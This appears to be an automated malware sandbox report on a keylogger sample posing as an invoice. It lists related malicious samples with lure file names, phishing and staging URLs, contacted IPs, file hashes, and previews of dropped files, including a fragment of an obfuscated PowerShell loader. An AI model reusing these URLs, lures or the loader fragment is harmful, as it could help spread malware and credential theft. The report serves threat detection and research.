                                                                          41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          rtransferencia-.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Q110450 SV51179-01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          z547GEViTFyfCZdLZP.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          TicariXHesapXXzetiniz.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          149.154.167.220Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              188.114.97.3https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                              • aa.opencompanies.co.uk/vEXJm/
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • paste.ee/d/KXy1F
                                                                                              01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                              • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                              PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.freedietbuilder.online/nnla/
                                                                                              http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                              • onlinecheapflights.net/
                                                                                              Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                              • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                              request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                              • www.ergeneescortg.xyz/guou/
                                                                                              Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.thetahostthe.top/9r5x/
                                                                                              http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                              • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                              SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                              • servicetelemetryserver.shop/api/index.php
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              reallyfreegeoip.orgSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 188.114.97.3
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 188.114.96.3
                                                                                              checkip.dyndns.comSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 158.101.44.242
                                                                                              PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 193.122.130.0
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 193.122.6.168
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              api.telegram.orgProduccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              TELEGRAMRUProduccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 149.154.167.220
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 149.154.167.220
                                                                                              CLOUDFLARENETUSSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              PO 635614 635613_CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.21.68.211
                                                                                              https://railrent-railrent.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.140.116
                                                                                              http://74.248.121.8/d/msdownload/update/software/defu/2024/10/updateplatform.amd64fre_d3f6f8300855e56b8ed00da6dac55a3c4cbf8c20.exe?cacheHostOrigin=au.download.windowsupdate.comGet hashmaliciousUnknownBrowse
                                                                                              • 172.64.41.3
                                                                                              https://landsmith.ae/continue.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              mm.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.177.220
                                                                                              https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                              • 104.21.53.8
                                                                                              https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.4.35
                                                                                              https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/Get hashmaliciousUnknownBrowse
                                                                                              • 104.22.21.209
                                                                                              UTMEMUSSIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              080210232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 132.226.247.73
                                                                                              WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.8.169
                                                                                              rRFQNO-N__MERODOPEDIDO106673.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              • 132.226.8.169
                                                                                              69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              eFo07GvEf0.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 132.226.247.73
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              05af1f5ca1b87cc9cc9b25185115607dtransferencia interbancaria_66579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.97.3
                                                                                              Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 188.114.97.3
                                                                                              Shipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 188.114.97.3
                                                                                              A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 188.114.97.3
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 188.114.97.3
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 188.114.97.3
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 188.114.97.3
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 188.114.97.3
                                                                                              7dcce5b76c8b17472d024758970a406bShipping Documents WMLREF115900.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              A & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.186.142
                                                                                              • 142.250.186.97
                                                                                              36f7277af969a6947a61ae0b815907a1CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              BL Packing List & Invoice.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              mnobizx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Quotation Botisk 1475-HIRSCH Technik,____________________________________________.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              quotation list 1.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              Scanned Copy.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):7837
                                                                                              Entropy (8bit):4.813557972296841
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:bxoe5uVsm5emdwVFn3eGOVpN6K3bkkjo5zgkjDt4iWN3yBGHVbdcU6COOuOBn:kkVoGIpN6KQkj2skjh4iUxoOdBn
                                                                                              MD5:79DC2D6859D68F13A7B81B39AA6046E9
                                                                                              SHA1:68218BA47682E82C9E74176FDA6E7DE1525FE7E4
                                                                                              SHA-256:BAD4B8119FA526EE766BFBA3B4B62EB94B94CC4FBF3765C1DE09830F722630F5
                                                                                              SHA-512:058B564F841705DF16958C3911C2011AEC47131445E8BE416BB190620F664453DA54C3D02459192E0E6FADC27C8387DE9A3E7625BFA939B75DC640E27F2278D0
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:1
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:1
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:ASCII text, with very long lines (3101), with CRLF, LF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):56940
                                                                                              Entropy (8bit):5.310851815132353
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:uEy/BE4CCwPB+92TmVYkP/23ytqHO0Trmd/jK:g/BEhC2M23ytqU2
                                                                                              MD5:6AC57B58205D75AEE6380C3C6A8EF2A2
                                                                                              SHA1:466480B2A43B6C6DD95253849ACAAFCEF82CA2B3
                                                                                              SHA-256:F79002317D2A561E589E0006DD549D39C71488689CE772B15F84F393926A2786
                                                                                              SHA-512:EA0DEA24679EDB7B4D10A62E23D52BF8102338BEA90957F27ADC92228A54BB0B49BB710B2ED9A159B48EB5AD1A353FDCEFB311A2569A82D1BED17F8F4E7782BE
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview:$Haevdes=$Langtidsplans;..<#Dressrer Afterburners indstrmning #>..<#pleurodira Undespatched Toldforretningen Paahldningernes #>..<#Reprsentantskabets Halfpace Indkopiering Fortyskningen Ophugningernes Instructionary Interruptedly #>..<#Ationsvejledningers Hungredes drmmearbejdes Elitrt Bageovnenes Dagbladet #>..<#Rdsptternes kfternes Bespisendes Klageinstansen Submaniacally Stengrunden #>..<#reshook Stiklingsformerings Brambly #>...$Urokkeligste = @'.Bilgg.Qr sk$Diomer Fague OuttvHexadaResolnAligrc faglhFabriiSjakbs SkrmtBimp eUndern En esUnpr =Scrip$H nteKUrorfoFiskemMi tem ntioiSi nasd.strsEnergo MaxirB aagi uckae PrearSprngsPaket; Pres. Snblf ,hafuMagn nStivlcBungttProteiRosteoP esenkongr .hviscUnderaS,ormrPrceddBysvai R lenVagr.aBard l BesvaSmdedtTvangeEnsursAnno Lands(Scri $ HorsVKlgtiiPretrcEnergtundivi ReakmHormei,edstskus ieLinj sChalk,A tif$ receDBren,eDekomc BacueAnod p Duo.tIndlei DvrgoStapeuMy etsBe tilRotunyunse )H sto Novel{B epi. Past.Omkl $pirouOOmklduLawsotMussawPaake
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Category:dropped
                                                                                              Size (bytes):1007528
                                                                                              Entropy (8bit):7.781042800324155
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:KBu+je2mGYUNpeqzfAOKUXWkP/8KYfNrnEoYhJLAMhuwIm/toWyqTnoXnPolxsq8:D+63cWqv3nANr8xAGuwIm/yWiopvC9wG
                                                                                              MD5:8274B1A41B53BF35E0B4330A20010D4C
                                                                                              SHA1:0B263F01DD3E10389CD4FE6575D114EA301EE874
                                                                                              SHA-256:D2320E5704E90BC713C59A0521BACF04CA5751C2481E1DD4E3A95494981D867C
                                                                                              SHA-512:727ED4FE93C9F0DA19DF61B81D3F92A9DDC9B6680B2AC841E1ED3ED37BBBE7ECC4A628DFDDF31429D2FB5034EDD6BC7F742A84F6E76FE7F7401DCD98EA3EC644
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                              Reputation:low
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P..s...P...V...P..Rich.P..........................PE..L...s..V.................`...*......j2.......p....@..........................p............@..................................t.......`..............XV..P............................................................p...............................text...._.......`.................. ..`.rdata..p....p.......d..............@..@.data................x..............@....ndata...................................rsrc........`.......~..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):322786
                                                                                              Entropy (8bit):7.714471072231169
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:s9f0Im/HiUPjZ0G2tKMrEX+s/jxbUznOpzWcILjNWgeN7yZw0:kf0Im/CYjZZwJs6zOpCcejNWgOuX
                                                                                              MD5:02093BF4E23F0DC4ED17ACE33F3071C3
                                                                                              SHA1:FF8E59EE5EB06847411F0F11319081ACC6510F8C
                                                                                              SHA-256:2F9C4D11C84DA12FC93D685D8A1CF99F0B7C9FE42D50BCD56E08D6E4B2A8014B
                                                                                              SHA-512:41F9D4A882D570DA60724494D64DAB81C2CACAB90B90B44CE5AE4726BD6DFAABF5C3E6ABF358575B3F321B62DBD7FCBC0788C49C135F511E5BE7826BDA6426CA
                                                                                              Malicious:false
                                                                                              Preview:..e.............&&&....................................,,,..........|........e.......)........<.hh....A.RR......^^...........................y.............................b........i.5....|.....ppppp...2...................DD.__.....**.X............@@.........t.l........f.''''.%%............O.(....................KKKK......A....{..m.........................##......................!!!!!!.....................l..........ss...........I........6...?................................:::::.....O..................^.........f................&..................~~~~..........DDDD.a............::..(.77.........666.............''............U.........<<<.'''.......LLL......*....................X.............................P.........O..".................t..........*......w...OO.......====.r.T...f.............................8...................e..............j.....,,.....A.222...........{...DD..m.................r..........zzzz.b.......HH.......o.....7................--......1111.......k............===
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):385451
                                                                                              Entropy (8bit):1.2576424697364599
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:0zQkaCkKFWCIXNc4VzKCrtjqcgRnPnpPhxpTF1HYRT78IvzOa0X8Y7/gTggxDFJp:icoCXuttGE6uCCi4amVuAE8M
                                                                                              MD5:26C2167385AF5F3AD4501DC9EB1D1750
                                                                                              SHA1:DC579F120929FEB6743A2E708B1ECB80AB5743FC
                                                                                              SHA-256:655E599A68EC316400412338207AEE3D1E92D871D44903330831863A8422DED6
                                                                                              SHA-512:3A5A916CD1D62017C0CB1DF2DD0E4162E1D65F7FC7B3F6910FC5476D75522BCBCA14A4B8BBB581A29D090E5CB624563B6D55BECE6663866E2D5003DBA3D32868
                                                                                              Malicious:false
                                                                                              Preview:........................[..........................,..............................................o............=9......................9.......................................................................i.................................}...........w...........X...................................................................................................a.......................O.........,................................]......J..................................r..........@.............................................................................*..X.......................n......R.................\......r...............4.............:.....................................................................................................................2...............T...)........n..................<.~......................W...............................\.....O..........................F.......................................................p.&......g......s...................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):365480
                                                                                              Entropy (8bit):1.2572303082633218
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:R/4C648E1cMH3VW/bm9QbMUw48AwMj29nPxjeUdd5Q7a2lUsNEsoUILUeGjYG2lr:x/9qJoJnheHT4tVHiQIrOKKH
                                                                                              MD5:7E5D0C2FB5542434DEAA7CB9992CF70A
                                                                                              SHA1:88C1347B18718DDFEBE207B0142337AA058088E1
                                                                                              SHA-256:042CA82320646FF84D77486DB582121776CDE3A7512AAD331C52A6F7F4477F07
                                                                                              SHA-512:ECAFFC3B8E35E933BA34D9B4E8FAA23F8504CB7E3EB749C8BA6329E35B9A9983C92D5F6361EEFAF408EEDB134C65CB71E1E9BDD7BBEC01F63CFF18B02B4E9CAA
                                                                                              Malicious:false
                                                                                              Preview:.......................*....-..F...................................................................................J+................................................}.........................J................5............................................J..........5.......W...=..n...&.A........1............./..........................................e.............f......................l......T.....................y............b................/.........................y...................................................\...........................................................................................................................!...............n...................N.....................a..............................................................[..........q.....n..........................._............................K...>.......................................k...............E.............................................................>.......8.......................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):394604
                                                                                              Entropy (8bit):1.254347273244326
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:xvceOaoCvXM6v7bWOSNFacQ8vOVOpLEaCJ:hp7v8yGVYcT
                                                                                              MD5:E2C31508D144E6C8890BC5DE64DBC952
                                                                                              SHA1:358FE8FF69899E52D55F9A22DF5888BC2F53E04A
                                                                                              SHA-256:E960C13536EDA3B4833CDC97DE94BD4505EBB2BDE345F8301108D7B02A6C3695
                                                                                              SHA-512:1147F2F1A552810B498623C4A8ED9DEC8A2897D49FC3672E89BA208B748076DC252B96500599F5F00805B41AE3C495DC26ECBF1484DC2E4C402FFB061F6CEEB0
                                                                                              Malicious:false
                                                                                              Preview:............................................'......2..........h..............-./...............\............................................m.................L...............................................y..........W.................*.......h...I...............q...........................................v.........S... .......B...........................8..............................................h..................w.......................................\.........................................r....Q.......6......................................................x...................................................................................................)......m............................................................................S......8.........................................................................<............................................w...................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):421672
                                                                                              Entropy (8bit):1.2617274907079155
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:NkcVLfyGsqWRxaFZcdE9c64XSMZBiMfg4EPcVdq9/aEeOD0CbLW/+Kf1BMwhindh:uPJSls/7dB0cDseO+yaKz1aWYlS6wTc
                                                                                              MD5:7B108EEEC00B60944878785541310B37
                                                                                              SHA1:18679F477149CF4571D581FE5F402C2320B31059
                                                                                              SHA-256:FADFB5887AE6B54C07F264798945B3D33DB6EC9A9A70C26B585149EF5E8CE972
                                                                                              SHA-512:D5E9C23E01A18FDC9BE811252CDED78649F1F8CD48C5F5BD8FDD1D6ED5AA29FE28E21B15705EAB4CAF743BEB7ED49B0DDA8439E9B40600D6715DA5B5C55BA775
                                                                                              Malicious:false
